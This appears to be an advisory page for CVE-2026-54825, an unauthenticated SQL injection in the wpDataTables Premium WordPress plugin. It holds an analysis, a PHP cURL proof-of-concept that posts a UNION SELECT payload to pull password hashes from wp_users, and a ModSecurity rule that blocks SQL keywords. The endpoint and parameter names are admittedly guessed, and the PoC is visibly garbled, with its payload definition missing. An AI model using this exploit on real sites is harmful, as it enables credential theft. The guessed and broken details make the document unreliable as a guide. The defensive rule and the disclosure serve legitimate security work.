CVE-2026-54825: wpDataTables (Premium) <= 7.4 Unauthenticated SQL Injection PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-54825 (metadata-based):nnThis vulnerability is an unauthenticated SQL Injection in the wpDataTables Premium plugin for WordPress, affecting versions up to and including 7.4. It carries a CVSS score of 7.5 (High) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The attacker needs no authentication and can execute arbitrary SQL queries against the database.nnThe root cause, as indicated by the CWE-89 classification and the description, is a failure to properly escape user-supplied parameters and insufficient preparation of existing SQL queries. This is a classic second-order or inline SQL injection where the plugin interpolates attacker-controlled input directly into an SQL statement without using prepared statements or parameterized queries (e.g., $wpdb->prepare). Since no code diff is available, Atomic Edge analysis infers that the vulnerable parameter is likely passed via a shortcode attribute, AJAX handler, or REST API endpoint controlled by the plugin. The lack of nonce verification or capability checks likely allows unauthenticated access to the vulnerable function.nnExploitation would involve sending a crafted HTTP request to the plugin’s public-facing endpoint. WordPress plugins commonly expose AJAX actions under the ‘wpdatatables’ slug. Based on the plugin’s functionality, the likely attack vector is an AJAX action such as ‘wpdatatables_get_table_data’ or ‘wpdatatables_load_table’ that accepts a table ID or query parameter. The attacker would inject SQL via a parameter like ‘id’, ‘table_id’, or ‘query’. A typical payload would be: action=wpdatatables_load_table&table_id=1 UNION SELECT user_pass FROM wp_users– . No authentication is required because the handler does not enforce current_user_can().nnRemediation requires the plugin developers to (1) use $wpdb->prepare() or similar parameterized queries for all SQL statements, (2) escape user-supplied input with esc_sql() as a secondary defense, and (3) implement proper authorization checks (e.g., current_user_can(‘edit_posts’)) on AJAX handlers. The patched version 7.4.1 likely addresses these issues by converting raw SQL interpolations to parameterized queries.nnImpact includes complete database disclosure. An unauthenticated attacker can extract all WordPress user credentials (hashed passwords), posts, options, and other sensitive data from the database. This can lead to privilege escalation if admin hashes are cracked, or further attacks like lateral movement through exposed internal data. The confidentiality impact is rated HIGH, while integrity and availability are not directly affected.’,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-54825 – wpDataTables (Premium) ‘wpdatatables_load_table’,n ‘table_id’ => $sql_payload,n ‘wdt_var1’ => ‘1’,n);nn// Initialize cURLn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_HEADER, false);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);nn// Execute requestn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);nn// Check for errorsnif (curl_errno($ch)) {n echo ‘[!] cURL error: ‘ . curl_error($ch) . PHP_EOL;n exit(1);n}nncurl_close($ch);nn// Output responsenif ($http_code === 200) {n echo ‘[+] Request succeeded (HTTP 200). Response body follows:’ . PHP_EOL;n echo $response . PHP_EOL;n n // Check if SQL injection likely worked by looking for user data patternsn if (preg_match(‘/[a-f0-9]{32}/i’, $response)) {n echo ‘[+] Likely SQL injection successful: extracted MD5-like hashes found.’ . PHP_EOL;n } elseif (preg_match(‘/\$P\$[A-Za-z0-9]{30,}/’, $response)) {n echo ‘[+] Likely SQL injection successful: extracted phpass hashes found.’ . PHP_EOL;n }n} else {n echo ‘[-] Request failed with HTTP code ‘ . $http_code . PHP_EOL;n}n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-54825 (metadata-based)n# Blocks unauthenticated SQL injection via wpDataTables AJAX handlern# This rule targets the inferred vulnerable endpoint: admin-ajax.php with action=wpdatatables_load_tablen# SQL injection pattern matches common UNION SELECT and OR-based attacksnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20261994,phase:2,deny,status:403,chain,msg:’CVE-2026-54825 – wpDataTables SQL Injection via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-54825′,tag:’wordpress’,tag:’wpdatatables'”n SecRule ARGS_POST:action “@streq wpdatatables_load_table” “chain”n SecRule ARGS_POST:table_id “@rx (?i)(union.*select|select.*from|insert.*into|update.*set|delete.*from|drop.*table|sleep\(|benchmark\()”n”
}